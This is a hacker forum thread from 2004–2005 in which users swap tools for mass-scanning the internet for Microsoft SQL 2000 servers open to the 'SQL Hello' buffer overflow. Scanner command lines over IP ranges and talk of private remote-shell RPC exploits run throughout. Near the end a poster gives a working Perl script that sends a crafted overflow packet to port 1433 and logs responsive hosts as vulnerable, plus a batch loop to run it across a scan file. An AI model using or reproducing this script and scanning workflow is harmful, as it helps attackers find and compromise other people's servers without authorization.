SQLScan is a Windows GUI scanner tailored specifically to finding SQL servers that may be vulnerable to the recent SQL "Slammer" or "SQHell" worm that attacks vulnerable Microsoft SQL 2000 servers.
thanq for the url but dont think this is the right scanner for SQLHello .. I had some results checking by hand .. and then checked it with these scanner and it didnt find my result ( shell vuln ) .. but thanks anyway
I found this vuln @ Buqtrack ID 53..
and Sql Hello is Buqtrack ID 5411
SkullSplitter
Sep 23 2004, 12:47 AM
when i remember right ,
is the sqlhello exploit over 2 years old
why do you want a scanner for this old shit ?
isaiah
Sep 23 2004, 01:09 AM
they are probly berlly getting exploit l00l
EzMe
Sep 23 2004, 02:13 AM
Gere u go m8
Usage: sqlhelloscanner2 scan.txt yourip > results.txt Make sure scan.txt being your scan file and you must enter your ip after scan.txt the rest explains its self
ganz2
Sep 23 2004, 04:08 AM
QUOTE (EzMe @ Sep 23 2004, 02:13 AM)
Gere u go m8
Usage: sqlhelloscanner2 scan.txt yourip > results.txt Make sure scan.txt being your scan file and you must enter your ip after scan.txt the rest explains its self
can u specify an ip range in the text file or must you list all ips?
BoNzO
Sep 23 2004, 07:06 AM
scan500 -p 1433 127.0.0.1 127.*.*.1 & good batch script...
MxMx
Sep 23 2004, 07:48 AM
yeah the SQL hello is 2 years old .. but still quite vulnerable
MxMx
Sep 23 2004, 02:02 PM
Help Me !
I typ sqlscanner.exe ips.txt myIP
the progs outputs a result.txt after 1 sec
I hasnt scanned my ips
iiiemuiii
Sep 24 2004, 12:04 AM
that's just how fast the scanner works. i scanned about 2000 ips in 5-8 seconds.
also u need to make sure the contents in your file must be just the ips.
MxMx
Sep 24 2004, 05:59 AM
jep ..
I had all ips listed .. no results?..
// the results list stays empty ..
dijk
Sep 24 2004, 06:18 AM
well you don't get much results nowaday so prob.. you don't have a vunerable.??
just a option......
ashk1a
Sep 24 2004, 07:32 AM
u can scan range of ips on port 1433 and then make a bat to check this ips if u can get shell or not (u can use sfind scanner)
by the way...any one heard about new rpc exploit??
arn0ld
Sep 24 2004, 08:47 AM
no dude is it prv ?
ashk1a
Sep 24 2004, 10:31 AM
ya its prv and her bug is on lsasrv.dll its new version of rpc exploits and u can get a remote shell on 539 port
ivan288
Sep 24 2004, 12:39 PM
QUOTE (ashk1a @ Sep 24 2004, 10:31 AM)
ya its prv and her bug is on lsasrv.dll its new version of rpc exploits and u can get a remote shell on 539 port
sounds sweet. remember the last rpc one, good times
dfind is very fast scanner scan1000 also use one of them to scan port 1433 than use foundstone@ sql scanner to checks vuln's "read IP's from file" add your port1433 scan file and start scan good luck
MxMx
Oct 3 2004, 06:55 AM
dunnow if foundstone's scanner is made for the sql hello exploit..
thanks for helping me anyway
untouchable
Oct 27 2004, 05:51 PM
there is too Dfind who not bad fot mssql
Dfind -sql 127.0.0.1 127.0.0.255 255
For exemple
MxMx
Oct 27 2004, 09:49 PM
owh ofcourse .. dumb me ..
thank y0
kAthArSiS
Oct 31 2004, 04:31 PM
nice. The sql hello vulnerable scanner is really needed !
NoRRiS
Oct 31 2004, 04:57 PM
QUOTE(kAthArSiS @ Oct 31 2004, 04:31 PM)
nice. The sql hello vulnerable scanner is really needed !
Juste make a portscan 1433 with an usual portscanner like scan100 500 or 1000
perky
Oct 31 2004, 06:59 PM
ok !
tuttefrut
Nov 2 2004, 12:28 PM
QUOTE
Juste make a portscan 1433 with an usual portscanner like scan100 500 or 1000
but then u have to check all ip's for vulnerability if you have a "sql hello vulnerable scanner" you know wich ip's are vuln. and unprotected ... that saves a lot of time when you are working with a large scanfile
Source
Nov 2 2004, 06:12 PM
QUOTE(tuttefrut @ Nov 2 2004, 12:28 PM)
QUOTE
Juste make a portscan 1433 with an usual portscanner like scan100 500 or 1000
but then u have to check all ip's for vulnerability if you have a "sql hello vulnerable scanner" you know wich ip's are vuln. and unprotected ... that saves a lot of time when you are working with a large scanfile
True
Or if somone has a batch file that will work with Dfind or somthing. Somthing that will check the ip list to see if there is vun ips to the hello exploit.
any idea's?
NoRRiS
Nov 4 2004, 09:57 PM
QUOTE(tuttefrut @ Nov 2 2004, 12:28 PM)
QUOTE
Juste make a portscan 1433 with an usual portscanner like scan100 500 or 1000
but then u have to check all ip's for vulnerability if you have a "sql hello vulnerable scanner" you know wich ip's are vuln. and unprotected ... that saves a lot of time when you are working with a large scanfile
Yes a real SQLHELLO scanner was beter But no SQLHELLO exist or it's private ^^
amnesia
Nov 15 2004, 01:57 AM
QUOTE(iiiemuiii @ Sep 24 2004, 08:04 AM)
that's just how fast the scanner works. i scanned about 2000 ips in 5-8 seconds.
also u need to make sure the contents in your file must be just the ips.
the attached file is missing. can someone attach it back please?
You have to enter your ip so I think the scanner works with an connect back exploit to test for vuln. On which port does it connect back? Am I right that the sqlhello source code is still private?
touk
Mar 23 2005, 02:50 PM
CODE
#!/usr/bin/perl # code by touk # for MxMx & GSO # Vulnerable hosts are in vulnerables.txt # This file needs to be named: vcsqlhello.pl
use IO::Socket; use IO::File; use Getopt::Std; getopts('s:', \%args); if(!defined($args{s})) { print "00ps, vcsqlhello.pl -s ipaddress!"; exit; } $serv = $args{s}; $bof="\x12\x01\x00\x34\x00\x00\x00\x00\x00\x00\x15\x00\x06\x01\x00\x1b"; #header $bof.="\x00\x01\x02\x00\x1c\x00\x0c\x03\x00\x28\x00\x04\xff\x08\x00\x02"; #header $bof.="\x10\x00\x00\x00"; #header $bof.="\x00\x24\x01\x00\x00"; #tail
$bof.="crap"x560; # crapmsg $remote = IO::Socket::INET->new( Proto => "tcp", PeerAddr => $args{s}, PeerPort => "(1433)", ) || die("[*] Server Down?\n"); print"[*] Sending VC string\n"; $remote->autoflush(1); print $remote "$bof"; print("[*] All Done...\n"); $remote->recv($answer,4096); if($answer ne '') {
print "[*] Vulnerable"; $resultfile = "vulnerables.txt"; $fh = IO::File->new("+>> $resultfile")or die "Couldn't open $file for writing: $!\n"; open(FH, "+>> $resultfile") or die $!; print FH "$args{s}\n"; close(FH); } else{ print "[*] Not Vulnerable"; exit 1; } sleep(2);
autochecker.bat : FOR /F "tokens=1* delims=," %%i in (scan.txt) do vcsqlhello.pl -s %%i
blumaster
Mar 29 2005, 11:59 AM
i thing that for me the best scanner for sql is Xray,but i'm using also Xscan with modificated file .dat where are the user and password.
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
(you can delete the other scripts and ... you have a hello scanner)
